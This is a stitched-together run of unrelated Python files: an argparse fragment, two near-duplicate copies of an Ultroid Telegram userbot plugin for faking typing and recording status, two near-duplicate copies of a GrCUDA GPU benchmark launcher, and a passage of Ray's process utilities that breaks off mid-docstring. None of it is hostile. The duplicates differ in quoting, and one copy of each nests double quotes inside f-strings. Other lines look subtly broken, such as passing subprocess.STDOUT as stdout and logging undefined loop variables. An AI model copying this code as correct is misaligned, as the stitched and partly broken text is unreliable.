Name for data results.", ) parser.add_argument("-sm", "--smoke_test", action="store_true") main(parser.parse_args())
# Ultroid - UserBot # Copyright (C) 2020 TeamUltroid # # This file is a part of < https://github.com/TeamUltroid/Ultroid/ > # PLease read the GNU Affero General Public License in # <https://www.github.com/TeamUltroid/Ultroid/blob/main/LICENSE/>. """ ✘ Commands Available - • `{i}ftyping <time/in secs>` `Show Fake Typing in current chat. ` • `{i}faudio <time/in secs>` `Show Fake Recording Action in current chat. ` • `{i}fvideo <time/in secs>` `Show Fake video action in current chat. ` • `{i}fgame <time/in secs>` `Show Fake Game Playing Action in current chat. ` """ from . import * @ultroid_cmd(pattern="ftyping ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake Typing For {t} sec.") async with e.client.action(e.chat_id, "typing"): await asyncio.sleep(t) @ultroid_cmd(pattern="faudio ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake audio recording For {t} sec.") async with e.client.action(e.chat_id, "record-audio"): await asyncio.sleep(t) @ultroid_cmd(pattern="fvideo ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake video recording For {t} sec.") async with e.client.action(e.chat_id, "record-video"): await asyncio.sleep(t) @ultroid_cmd(pattern="fgame ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake Game Playing For {t} sec.") async with e.client.action(e.chat_id, "game"): await asyncio.sleep(t) HELP.update({f"{__name__.split(".")[1]}": f"{__doc__.format(i=HNDLR)}"})
# Ultroid - UserBot # Copyright (C) 2020 TeamUltroid # # This file is a part of < https://github.com/TeamUltroid/Ultroid/ > # PLease read the GNU Affero General Public License in # <https://www.github.com/TeamUltroid/Ultroid/blob/main/LICENSE/>. """ ✘ Commands Available - • `{i}ftyping <time/in secs>` `Show Fake Typing in current chat. ` • `{i}faudio <time/in secs>` `Show Fake Recording Action in current chat. ` • `{i}fvideo <time/in secs>` `Show Fake video action in current chat. ` • `{i}fgame <time/in secs>` `Show Fake Game Playing Action in current chat. ` """ from . import * @ultroid_cmd(pattern="ftyping ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake Typing For {t} sec.") async with e.client.action(e.chat_id, "typing"): await asyncio.sleep(t) @ultroid_cmd(pattern="faudio ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake audio recording For {t} sec.") async with e.client.action(e.chat_id, "record-audio"): await asyncio.sleep(t) @ultroid_cmd(pattern="fvideo ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake video recording For {t} sec.") async with e.client.action(e.chat_id, "record-video"): await asyncio.sleep(t) @ultroid_cmd(pattern="fgame ?(.*)") async def _(e): t = e.pattern_match.group(1) if not (t or t.isdigit()): t = 100 else: try: t = int(t) except BaseException: try: t = await ban_time(e, t) except BaseException: return await eod(e, "`Incorrect Format`") await eod(e, f"Starting Fake Game Playing For {t} sec.") async with e.client.action(e.chat_id, "game"): await asyncio.sleep(t) HELP.update({f"{__name__.split('.')[1]}": f"{__doc__.format(i=HNDLR)}"})
import argparse import subprocess import time import os from datetime import datetime from benchmark_result import BenchmarkResult from benchmark_main import create_block_size_list from java.lang import System ############################## ############################## DEFAULT_NUM_BLOCKS = 32 # GTX 960, 8 SM DEFAULT_NUM_BLOCKS = 448 # P100, 56 SM DEFAULT_NUM_BLOCKS = 176 # GTX 1660 Super, 22 SM HEAP_SIZE = 26 #HEAP_SIZE = 140 # P100 # Benchmark settings; benchmarks = [ "b1", "b5", "b6", "b7", "b8", "b10", ] # GTX 960 num_elem = { "b1": [1000],#[20_000_000, 60_000_000, 80_000_000, 100_000_000, 120_000_000], "b5": [2000],#[2_000_000, 6_000_000, 8_000_000, 10_000_000, 12_000_000], "b6": [200],#[200_000, 500_000, 800_000, 1_000_000, 1_200_000], "b7": [4000],#[4_000_000, 7_000_000, 10_000_000, 15_000_000, 20_000_000], "b8": [800],#[1600, 2400, 3200, 4000, 4800], "b10": [300],#[3000, 4000, 5000, 6000, 7000], } # P100 #num_elem = { # "b1": [120_000_000, 200_000_000, 500_000_000, 600_000_000, 700_000_000], # "b5": [12_000_000, 20_000_000, 50_000_000, 60_000_000, 70_000_000], # "b6": [1_200_000, 2_000_000, 4_000_000, 5_000_000, 6_000_000], # "b7": [20_000_000, 40_000_000, 60_000_000, 100_000_000, 140_000_000], # "b8": [4800, 8000, 10000, 12000, 16000], # "b10": [7000, 10000, 12000, 14000, 16000], #} # GTX 1660 Super #num_elem = { # "b1": [60_000_000, 80_000_000, 100_000_000, 120_000_000, 200_000_000], # "b5": [6_000_000, 8_000_000, 10_000_000, 12_000_000, 20_000_000], # "b6": [500_000, 800_000, 1_000_000, 1_200_000, 2_000_000], # "b7": [7_000_000, 10_000_000, 15_000_000, 20_000_000, 40_000_000], # "b8": [3200, 4000, 4800, 8000, 10000], # "b10": [6000, 7000, 10000, 12000, 14000], #} exec_policies = ["default"]#, "sync"] cuda_exec_policies = ["default", "sync", "cudagraph", "cudagraphmanual", "cudagraphsingle"] new_stream_policies = ["always-new"] parent_stream_policies = ["disjoint"] dependency_policies = ["with-const"] prefetch = [True, False] block_sizes_1d = [32]#[32, 128, 256, 1024] block_sizes_2d = [8]#[8, 8, 8, 8] # 960 # block_dim_dict = { # "b1": DEFAULT_NUM_BLOCKS, # "b5": DEFAULT_NUM_BLOCKS, # "b6": 32, # "b7": DEFAULT_NUM_BLOCKS, # "b8": 12, # "b10": 16, # } # P100 # block_dim_dict = { # "b1": DEFAULT_NUM_BLOCKS, # "b5": DEFAULT_NUM_BLOCKS, # "b6": 64, # "b7": DEFAULT_NUM_BLOCKS, # "b8": 32, # "b10": DEFAULT_NUM_BLOCKS, # } # 1660 block_dim_dict = { "b1": DEFAULT_NUM_BLOCKS, "b5": DEFAULT_NUM_BLOCKS, "b6": 32, "b7": DEFAULT_NUM_BLOCKS, "b8": 16, "b10": DEFAULT_NUM_BLOCKS, } ############################## ############################## CUDA_CMD = "./b -k {} -p {} -n {} -b {} -c {} -t {} -g {} {} {} | tee {}" def execute_cuda_benchmark(benchmark, size, block_size, exec_policy, num_iter, debug, prefetch=False, num_blocks=DEFAULT_NUM_BLOCKS, output_date=None): if debug: BenchmarkResult.log_message("") BenchmarkResult.log_message("") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message(f"Benchmark {i + 1}/{tot_benchmarks}") BenchmarkResult.log_message(f"benchmark={b}, size={n}," f" block size={block_size}, " f" prefetch={prefetch}, " f" num blocks={num_blocks}, " f" exec policy={exec_policy}") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message("") BenchmarkResult.log_message("") if not output_date: output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") file_name = f"cuda_{output_date}_{benchmark}_{exec_policy}_{size}_{block_size["block_size_1d"]}_{block_size["block_size_2d"]}_{prefetch}_{num_iter}_{num_blocks}.csv" # Create a folder if it doesn't exist; output_folder_path = os.path.join(BenchmarkResult.DEFAULT_RES_FOLDER, output_date + "_cuda") if not os.path.exists(output_folder_path): if debug: BenchmarkResult.log_message(f"creating result folder: {output_folder_path}") os.mkdir(output_folder_path) output_path = os.path.join(output_folder_path, file_name) benchmark_cmd = CUDA_CMD.format(benchmark, exec_policy, size, block_size["block_size_1d"], block_size["block_size_2d"], num_iter, num_blocks, "-r" if prefetch else "", "-a", output_path) start = System.nanoTime() result = subprocess.run(benchmark_cmd, shell=True, stdout=subprocess.STDOUT, cwd=f"{os.getenv("GRCUDA_HOME")}/projects/resources/cuda/bin") result.check_returncode() end = System.nanoTime() if debug: BenchmarkResult.log_message(f"Benchmark total execution time: {(end - start) / 1_000_000_000:.2f} seconds") ############################## ############################## GRAALPYTHON_CMD = "graalpython --vm.XX:MaxHeapSize={}G --jvm --polyglot " \ "--grcuda.RetrieveNewStreamPolicy={} {} --grcuda.ForceStreamAttach --grcuda.ExecutionPolicy={} --grcuda.DependencyPolicy={} " \ "--grcuda.RetrieveParentStreamPolicy={} benchmark_main.py -i {} -n {} -g {} " \ "--reinit false --realloc false -b {} --block_size_1d {} --block_size_2d {} --no_cpu_validation {} {} -o {}" def execute_grcuda_benchmark(benchmark, size, block_sizes, exec_policy, new_stream_policy, parent_stream_policy, dependency_policy, num_iter, debug, time_phases, num_blocks=DEFAULT_NUM_BLOCKS, prefetch=False, output_date=None): if debug: BenchmarkResult.log_message("") BenchmarkResult.log_message("") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message(f"Benchmark {i + 1}/{tot_benchmarks}") BenchmarkResult.log_message(f"benchmark={benchmark}, size={n}," f"block sizes={block_sizes}, " f"num blocks={num_blocks}, " f"exec policy={exec_policy}, " f"new stream policy={new_stream_policy}, " f"parent stream policy={parent_stream_policy}, " f"dependency policy={dependency_policy}, " f"prefetch={prefetch}, " f"time_phases={time_phases}") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message("") BenchmarkResult.log_message("") if not output_date: output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") file_name = f"{output_date}_{benchmark}_{exec_policy}_{new_stream_policy}_{parent_stream_policy}_" \ f"{dependency_policy}_{prefetch}_{size}_{num_iter}_{num_blocks}.json" # Create a folder if it doesn't exist; output_folder_path = os.path.join(BenchmarkResult.DEFAULT_RES_FOLDER, output_date + "_grcuda") if not os.path.exists(output_folder_path): if debug: BenchmarkResult.log_message(f"creating result folder: {output_folder_path}") os.mkdir(output_folder_path) output_path = os.path.join(output_folder_path, file_name) b1d_size = " ".join([str(b['block_size_1d']) for b in block_sizes]) b2d_size = " ".join([str(b['block_size_2d']) for b in block_sizes]) benchmark_cmd = GRAALPYTHON_CMD.format(HEAP_SIZE, new_stream_policy, "--grcuda.InputPrefetch" if prefetch else "", exec_policy, dependency_policy, parent_stream_policy, num_iter, size, num_blocks, benchmark, b1d_size, b2d_size, "-d" if debug else "", "-p" if time_phases else "", output_path) start = System.nanoTime() result = subprocess.run(benchmark_cmd, shell=True, stdout=subprocess.STDOUT, cwd=f"{os.getenv("GRCUDA_HOME")}/projects/resources/python/benchmark") result.check_returncode() end = System.nanoTime() if debug: BenchmarkResult.log_message(f"Benchmark total execution time: {(end - start) / 1_000_000_000:.2f} seconds") ############################## ############################## if __name__ == "__main__": parser = argparse.ArgumentParser(description="Wrap the GrCUDA benchmark to specify additional settings") parser.add_argument("-d", "--debug", action="store_true", help="If present, print debug messages") parser.add_argument("-c", "--cuda_test", action="store_true", help="If present, run performance tests using CUDA") parser.add_argument("-i", "--num_iter", metavar="N", type=int, default=BenchmarkResult.DEFAULT_NUM_ITER, help="Number of times each benchmark is executed") parser.add_argument("-g", "--num_blocks", metavar="N", type=int, help="Number of blocks in each kernel, when applicable") parser.add_argument("-p", "--time_phases", action="store_true", help="Measure the execution time of each phase of the benchmark;" " note that this introduces overheads, and might influence the total execution time") # Parse the input arguments; args = parser.parse_args() debug = args.debug if args.debug else BenchmarkResult.DEFAULT_DEBUG num_iter = args.num_iter if args.num_iter else BenchmarkResult.DEFAULT_NUM_ITER use_cuda = args.cuda_test time_phases = args.time_phases num_blocks = args.num_blocks # Setup the block size for each benchmark; block_sizes = create_block_size_list(block_sizes_1d, block_sizes_2d) if debug: BenchmarkResult.log_message(f"using block sizes: {block_sizes}; using low-level CUDA benchmarks: {use_cuda}") def tot_benchmark_count(): tot = 0 if use_cuda: for b in benchmarks: tot += len(num_elem[b]) * len(block_sizes) * len(cuda_exec_policies) * len(new_stream_policies) * len(parent_stream_policies) * len(dependency_policies) * len(prefetch) else: for b in benchmarks: tot += len(num_elem[b]) * len(exec_policies) * len(prefetch) return tot output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") # Execute each test; i = 0 tot_benchmarks = tot_benchmark_count() for b in benchmarks: for n in num_elem[b]: if use_cuda: # CUDA Benchmarks; for exec_policy in cuda_exec_policies: for block_size in block_sizes: for p in prefetch: nb = num_blocks if num_blocks else block_dim_dict[b] execute_cuda_benchmark(b, n, block_size, exec_policy, num_iter, debug, num_blocks=nb, prefetch=p, output_date=output_date) i += 1 # GrCUDA Benchmarks; else: for exec_policy in exec_policies: for new_stream_policy in new_stream_policies: for parent_stream_policy in parent_stream_policies: for dependency_policy in dependency_policies: for p in prefetch: nb = num_blocks if num_blocks else block_dim_dict[b] execute_grcuda_benchmark(b, n, block_sizes, exec_policy, new_stream_policy, parent_stream_policy, dependency_policy, num_iter, debug, time_phases, prefetch=p, num_blocks=nb, output_date=output_date) i += 1
import argparse import subprocess import time import os from datetime import datetime from benchmark_result import BenchmarkResult from benchmark_main import create_block_size_list from java.lang import System ############################## ############################## DEFAULT_NUM_BLOCKS = 32 # GTX 960, 8 SM DEFAULT_NUM_BLOCKS = 448 # P100, 56 SM DEFAULT_NUM_BLOCKS = 176 # GTX 1660 Super, 22 SM HEAP_SIZE = 26 #HEAP_SIZE = 140 # P100 # Benchmark settings; benchmarks = [ "b1", "b5", "b6", "b7", "b8", "b10", ] # GTX 960 num_elem = { "b1": [1000],#[20_000_000, 60_000_000, 80_000_000, 100_000_000, 120_000_000], "b5": [2000],#[2_000_000, 6_000_000, 8_000_000, 10_000_000, 12_000_000], "b6": [200],#[200_000, 500_000, 800_000, 1_000_000, 1_200_000], "b7": [4000],#[4_000_000, 7_000_000, 10_000_000, 15_000_000, 20_000_000], "b8": [800],#[1600, 2400, 3200, 4000, 4800], "b10": [300],#[3000, 4000, 5000, 6000, 7000], } # P100 #num_elem = { # "b1": [120_000_000, 200_000_000, 500_000_000, 600_000_000, 700_000_000], # "b5": [12_000_000, 20_000_000, 50_000_000, 60_000_000, 70_000_000], # "b6": [1_200_000, 2_000_000, 4_000_000, 5_000_000, 6_000_000], # "b7": [20_000_000, 40_000_000, 60_000_000, 100_000_000, 140_000_000], # "b8": [4800, 8000, 10000, 12000, 16000], # "b10": [7000, 10000, 12000, 14000, 16000], #} # GTX 1660 Super #num_elem = { # "b1": [60_000_000, 80_000_000, 100_000_000, 120_000_000, 200_000_000], # "b5": [6_000_000, 8_000_000, 10_000_000, 12_000_000, 20_000_000], # "b6": [500_000, 800_000, 1_000_000, 1_200_000, 2_000_000], # "b7": [7_000_000, 10_000_000, 15_000_000, 20_000_000, 40_000_000], # "b8": [3200, 4000, 4800, 8000, 10000], # "b10": [6000, 7000, 10000, 12000, 14000], #} exec_policies = ["default"]#, "sync"] cuda_exec_policies = ["default", "sync", "cudagraph", "cudagraphmanual", "cudagraphsingle"] new_stream_policies = ["always-new"] parent_stream_policies = ["disjoint"] dependency_policies = ["with-const"] prefetch = [True, False] block_sizes_1d = [32]#[32, 128, 256, 1024] block_sizes_2d = [8]#[8, 8, 8, 8] # 960 # block_dim_dict = { # "b1": DEFAULT_NUM_BLOCKS, # "b5": DEFAULT_NUM_BLOCKS, # "b6": 32, # "b7": DEFAULT_NUM_BLOCKS, # "b8": 12, # "b10": 16, # } # P100 # block_dim_dict = { # "b1": DEFAULT_NUM_BLOCKS, # "b5": DEFAULT_NUM_BLOCKS, # "b6": 64, # "b7": DEFAULT_NUM_BLOCKS, # "b8": 32, # "b10": DEFAULT_NUM_BLOCKS, # } # 1660 block_dim_dict = { "b1": DEFAULT_NUM_BLOCKS, "b5": DEFAULT_NUM_BLOCKS, "b6": 32, "b7": DEFAULT_NUM_BLOCKS, "b8": 16, "b10": DEFAULT_NUM_BLOCKS, } ############################## ############################## CUDA_CMD = "./b -k {} -p {} -n {} -b {} -c {} -t {} -g {} {} {} | tee {}" def execute_cuda_benchmark(benchmark, size, block_size, exec_policy, num_iter, debug, prefetch=False, num_blocks=DEFAULT_NUM_BLOCKS, output_date=None): if debug: BenchmarkResult.log_message("") BenchmarkResult.log_message("") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message(f"Benchmark {i + 1}/{tot_benchmarks}") BenchmarkResult.log_message(f"benchmark={b}, size={n}," f" block size={block_size}, " f" prefetch={prefetch}, " f" num blocks={num_blocks}, " f" exec policy={exec_policy}") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message("") BenchmarkResult.log_message("") if not output_date: output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") file_name = f"cuda_{output_date}_{benchmark}_{exec_policy}_{size}_{block_size['block_size_1d']}_{block_size['block_size_2d']}_{prefetch}_{num_iter}_{num_blocks}.csv" # Create a folder if it doesn't exist; output_folder_path = os.path.join(BenchmarkResult.DEFAULT_RES_FOLDER, output_date + "_cuda") if not os.path.exists(output_folder_path): if debug: BenchmarkResult.log_message(f"creating result folder: {output_folder_path}") os.mkdir(output_folder_path) output_path = os.path.join(output_folder_path, file_name) benchmark_cmd = CUDA_CMD.format(benchmark, exec_policy, size, block_size["block_size_1d"], block_size["block_size_2d"], num_iter, num_blocks, "-r" if prefetch else "", "-a", output_path) start = System.nanoTime() result = subprocess.run(benchmark_cmd, shell=True, stdout=subprocess.STDOUT, cwd=f"{os.getenv('GRCUDA_HOME')}/projects/resources/cuda/bin") result.check_returncode() end = System.nanoTime() if debug: BenchmarkResult.log_message(f"Benchmark total execution time: {(end - start) / 1_000_000_000:.2f} seconds") ############################## ############################## GRAALPYTHON_CMD = "graalpython --vm.XX:MaxHeapSize={}G --jvm --polyglot " \ "--grcuda.RetrieveNewStreamPolicy={} {} --grcuda.ForceStreamAttach --grcuda.ExecutionPolicy={} --grcuda.DependencyPolicy={} " \ "--grcuda.RetrieveParentStreamPolicy={} benchmark_main.py -i {} -n {} -g {} " \ "--reinit false --realloc false -b {} --block_size_1d {} --block_size_2d {} --no_cpu_validation {} {} -o {}" def execute_grcuda_benchmark(benchmark, size, block_sizes, exec_policy, new_stream_policy, parent_stream_policy, dependency_policy, num_iter, debug, time_phases, num_blocks=DEFAULT_NUM_BLOCKS, prefetch=False, output_date=None): if debug: BenchmarkResult.log_message("") BenchmarkResult.log_message("") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message(f"Benchmark {i + 1}/{tot_benchmarks}") BenchmarkResult.log_message(f"benchmark={benchmark}, size={n}," f"block sizes={block_sizes}, " f"num blocks={num_blocks}, " f"exec policy={exec_policy}, " f"new stream policy={new_stream_policy}, " f"parent stream policy={parent_stream_policy}, " f"dependency policy={dependency_policy}, " f"prefetch={prefetch}, " f"time_phases={time_phases}") BenchmarkResult.log_message("#" * 30) BenchmarkResult.log_message("") BenchmarkResult.log_message("") if not output_date: output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") file_name = f"{output_date}_{benchmark}_{exec_policy}_{new_stream_policy}_{parent_stream_policy}_" \ f"{dependency_policy}_{prefetch}_{size}_{num_iter}_{num_blocks}.json" # Create a folder if it doesn't exist; output_folder_path = os.path.join(BenchmarkResult.DEFAULT_RES_FOLDER, output_date + "_grcuda") if not os.path.exists(output_folder_path): if debug: BenchmarkResult.log_message(f"creating result folder: {output_folder_path}") os.mkdir(output_folder_path) output_path = os.path.join(output_folder_path, file_name) b1d_size = " ".join([str(b['block_size_1d']) for b in block_sizes]) b2d_size = " ".join([str(b['block_size_2d']) for b in block_sizes]) benchmark_cmd = GRAALPYTHON_CMD.format(HEAP_SIZE, new_stream_policy, "--grcuda.InputPrefetch" if prefetch else "", exec_policy, dependency_policy, parent_stream_policy, num_iter, size, num_blocks, benchmark, b1d_size, b2d_size, "-d" if debug else "", "-p" if time_phases else "", output_path) start = System.nanoTime() result = subprocess.run(benchmark_cmd, shell=True, stdout=subprocess.STDOUT, cwd=f"{os.getenv('GRCUDA_HOME')}/projects/resources/python/benchmark") result.check_returncode() end = System.nanoTime() if debug: BenchmarkResult.log_message(f"Benchmark total execution time: {(end - start) / 1_000_000_000:.2f} seconds") ############################## ############################## if __name__ == "__main__": parser = argparse.ArgumentParser(description="Wrap the GrCUDA benchmark to specify additional settings") parser.add_argument("-d", "--debug", action="store_true", help="If present, print debug messages") parser.add_argument("-c", "--cuda_test", action="store_true", help="If present, run performance tests using CUDA") parser.add_argument("-i", "--num_iter", metavar="N", type=int, default=BenchmarkResult.DEFAULT_NUM_ITER, help="Number of times each benchmark is executed") parser.add_argument("-g", "--num_blocks", metavar="N", type=int, help="Number of blocks in each kernel, when applicable") parser.add_argument("-p", "--time_phases", action="store_true", help="Measure the execution time of each phase of the benchmark;" " note that this introduces overheads, and might influence the total execution time") # Parse the input arguments; args = parser.parse_args() debug = args.debug if args.debug else BenchmarkResult.DEFAULT_DEBUG num_iter = args.num_iter if args.num_iter else BenchmarkResult.DEFAULT_NUM_ITER use_cuda = args.cuda_test time_phases = args.time_phases num_blocks = args.num_blocks # Setup the block size for each benchmark; block_sizes = create_block_size_list(block_sizes_1d, block_sizes_2d) if debug: BenchmarkResult.log_message(f"using block sizes: {block_sizes}; using low-level CUDA benchmarks: {use_cuda}") def tot_benchmark_count(): tot = 0 if use_cuda: for b in benchmarks: tot += len(num_elem[b]) * len(block_sizes) * len(cuda_exec_policies) * len(new_stream_policies) * len(parent_stream_policies) * len(dependency_policies) * len(prefetch) else: for b in benchmarks: tot += len(num_elem[b]) * len(exec_policies) * len(prefetch) return tot output_date = datetime.now().strftime("%Y_%m_%d_%H_%M_%S") # Execute each test; i = 0 tot_benchmarks = tot_benchmark_count() for b in benchmarks: for n in num_elem[b]: if use_cuda: # CUDA Benchmarks; for exec_policy in cuda_exec_policies: for block_size in block_sizes: for p in prefetch: nb = num_blocks if num_blocks else block_dim_dict[b] execute_cuda_benchmark(b, n, block_size, exec_policy, num_iter, debug, num_blocks=nb, prefetch=p, output_date=output_date) i += 1 # GrCUDA Benchmarks; else: for exec_policy in exec_policies: for new_stream_policy in new_stream_policies: for parent_stream_policy in parent_stream_policies: for dependency_policy in dependency_policies: for p in prefetch: nb = num_blocks if num_blocks else block_dim_dict[b] execute_grcuda_benchmark(b, n, block_sizes, exec_policy, new_stream_policy, parent_stream_policy, dependency_policy, num_iter, debug, time_phases, prefetch=p, num_blocks=nb, output_date=output_date) i += 1
import base64 import collections import errno import io import json import logging import multiprocessing import os from pathlib import Path import mmap import random import shutil import signal import socket import subprocess import sys import time from typing import Optional # Ray modules import ray import ray.ray_constants as ray_constants import redis # Import psutil and colorama after ray so the packaged version is used. import colorama import psutil resource = None if sys.platform != "win32": import resource EXE_SUFFIX = ".exe" if sys.platform == "win32" else "" # True if processes are run in the valgrind profiler. RUN_RAYLET_PROFILER = False # Location of the redis server and module. RAY_HOME = os.path.join(os.path.dirname(os.path.dirname(__file__)), "../..") RAY_PATH = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) RAY_PRIVATE_DIR = "_private" AUTOSCALER_PRIVATE_DIR = "autoscaler/_private" REDIS_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/thirdparty/redis/src/redis-server" + EXE_SUFFIX) REDIS_MODULE = os.path.join( RAY_PATH, "core/src/ray/gcs/redis_module/libray_redis_module.so") # Location of the raylet executables. RAYLET_EXECUTABLE = os.path.join(RAY_PATH, "core/src/ray/raylet/raylet" + EXE_SUFFIX) GCS_SERVER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/gcs/gcs_server" + EXE_SUFFIX) # Location of the cpp default worker executables. DEFAULT_WORKER_EXECUTABLE = os.path.join( RAY_PATH, "core/src/ray/cpp/default_worker" + EXE_SUFFIX) # Logger for this module. It should be configured at the entry point # into the program using Ray. Ray provides a default configuration at # entry/init points. logger = logging.getLogger(__name__) ProcessInfo = collections.namedtuple("ProcessInfo", [ "process", "stdout_file", "stderr_file", "use_valgrind", "use_gdb", "use_valgrind_profiler", "use_perftools_profiler", "use_tmux", ]) def serialize_config(config): return base64.b64encode(json.dumps(config).encode("utf-8")).decode("utf-8") class ConsolePopen(subprocess.Popen): if sys.platform == "win32": def terminate(self): if isinstance(self.stdin, io.IOBase): self.stdin.close() if self._use_signals: self.send_signal(signal.CTRL_BREAK_EVENT) else: super(ConsolePopen, self).terminate() def __init__(self, *args, **kwargs): # CREATE_NEW_PROCESS_GROUP is used to send Ctrl+C on Windows: # https://docs.python.org/3/library/subprocess.html#subprocess.Popen.send_signal new_pgroup = subprocess.CREATE_NEW_PROCESS_GROUP flags_to_add = 0 if ray._private.utils.detect_fate_sharing_support(): # If we don't have kernel-mode fate-sharing, then don't do this # because our children need to be in out process group for # the process reaper to properly terminate them. flags_to_add = new_pgroup flags_key = "creationflags" if flags_to_add: kwargs[flags_key] = (kwargs.get(flags_key) or 0) | flags_to_add self._use_signals = (kwargs[flags_key] & new_pgroup) super(ConsolePopen, self).__init__(*args, **kwargs) def address(ip_address, port): return ip_address + ":" + str(port) def new_port(lower_bound=10000, upper_bound=65535, denylist=None): if not denylist: denylist = set() port = random.randint(lower_bound, upper_bound) retry = 0 while port in denylist: if retry > 100: break port = random.randint(lower_bound, upper_bound) retry += 1 if retry > 100: raise ValueError("Failed to find a new port from the range " f"{lower_bound}-{upper_bound}. Denylist: {denylist}") return port def find_redis_address(address=None): """ Attempts to find all valid Ray redis addresses on this node. Returns: Set of detected Redis instances. """ # Currently, this extracts the deprecated --redis-address from the command # that launched the raylet running on this node, if any. Anyone looking to # edit this function should be warned that these commands look like, for # example: # /usr/local/lib/python3.8/dist-packages/ray/core/src/ray/raylet/raylet # --redis_address=123.456.78.910 --node_ip_address=123.456.78.910 # --raylet_socket_name=... --store_socket_name=... --object_manager_port=0 # --min_worker_port=10000 --max_worker_port=10999 # --node_manager_port=58578 --redis_port=6379 # --maximum_startup_concurrency=8 # --static_resource_list=node:123.456.78.910,1.0,object_store_memory,66 # --config_list=plasma_store_as_thread,True # --python_worker_command=/usr/bin/python # /usr/local/lib/python3.8/dist-packages/ray/workers/default_worker.py # --redis-address=123.456.78.910:6379 # --node-ip-address=123.456.78.910 --node-manager-port=58578 # --object-store-name=... --raylet-name=... # --temp-dir=/tmp/ray # --metrics-agent-port=41856 --redis-password=[MASKED] # --java_worker_command= --cpp_worker_command= # --redis_password=[MASKED] --temp_dir=/tmp/ray --session_dir=... # --metrics-agent-port=41856 --metrics_export_port=64229 # --agent_command=/usr/bin/python # -u /usr/local/lib/python3.8/dist-packages/ray/new_dashboard/agent.py # --redis-address=123.456.78.910:6379 --metrics-export-port=64229 # --dashboard-agent-port=41856 --node-manager-port=58578 # --object-store-name=... --raylet-name=... --temp-dir=/tmp/ray # --log-dir=/tmp/ray/session_2020-11-08_14-29-07_199128_278000/logs # --redis-password=[MASKED] --object_store_memory=5037192806 # --plasma_directory=/tmp # Longer arguments are elided with ... but all arguments from this instance # are included, to provide a sense of what is in these. # Indeed, we had to pull --redis-address to the front of each call to make # this readable. # As you can see, this is very long and complex, which is why we can't # simply extract all the the arguments using regular expressions and # present a dict as if we never lost track of these arguments, for # example. Picking out --redis-address below looks like it might grab the # wrong thing, but double-checking that we're finding the correct process # by checking that the contents look like we expect would probably be prone # to choking in unexpected ways. # Notice that --redis-address appears twice. This is not a copy-paste # error; this is the reason why the for loop below attempts to pick out # every appearance of --redis-address. # The --redis-address here is what is now called the --address, but it # appears in the default_worker.py and agent.py calls as --redis-address. pids = psutil.pids() redis_addresses = set() for pid in pids: try: proc = psutil.Process(pid) # HACK: Workaround for UNIX idiosyncrasy # Normally, cmdline() is supposed to return the argument list. # But it in some cases (such as when setproctitle is called), # an arbitrary string resembling a command-line is stored in # the first argument. # Explanation: https://unix.stackexchange.com/a/432681 # More info: https://github.com/giampaolo/psutil/issues/1179 cmdline = proc.cmdline() # NOTE(kfstorm): To support Windows, we can't use # `os.path.basename(cmdline[0]) == "raylet"` here. if len(cmdline) > 0 and "raylet" in os.path.basename(cmdline[0]): for arglist in cmdline: # Given we're merely seeking --redis-address, we just split # every argument on spaces for now. for arg in arglist.split(" "): # TODO(ekl): Find a robust solution for locating Redis. if arg.startswith("--redis-address="): proc_addr = arg.split("=")[1] if address is not None and address != proc_addr: continue redis_addresses.add(proc_addr) except psutil.AccessDenied: pass except psutil.NoSuchProcess: pass return redis_addresses def get_ray_address_to_use_or_die(): """ Attempts to find an address for an existing Ray cluster if it is not already specified as an environment variable. Returns: A string to pass into `ray.init(address=...)` """ return os.environ.get(ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE, find_redis_address_or_die()) def find_redis_address_or_die(): redis_addresses = find_redis_address() if len(redis_addresses) > 1: raise ConnectionError( f"Found multiple active Ray instances: {redis_addresses}. " "Please specify the one to connect to by setting `address`.") sys.exit(1) elif not redis_addresses: raise ConnectionError( "Could not find any running Ray instance. " "Please specify the one to connect to by setting `address`.") return redis_addresses.pop() def wait_for_node(redis_address, node_plasma_store_socket_name, redis_password=None, timeout=30): """Wait until this node has appeared in the client table. Args: redis_address (str): The redis address. node_plasma_store_socket_name (str): The plasma_store_socket_name for the given node which we wait for. redis_password (str): the redis password. timeout: The amount of time in seconds to wait before raising an exception. Raises: TimeoutError: An exception is raised if the timeout 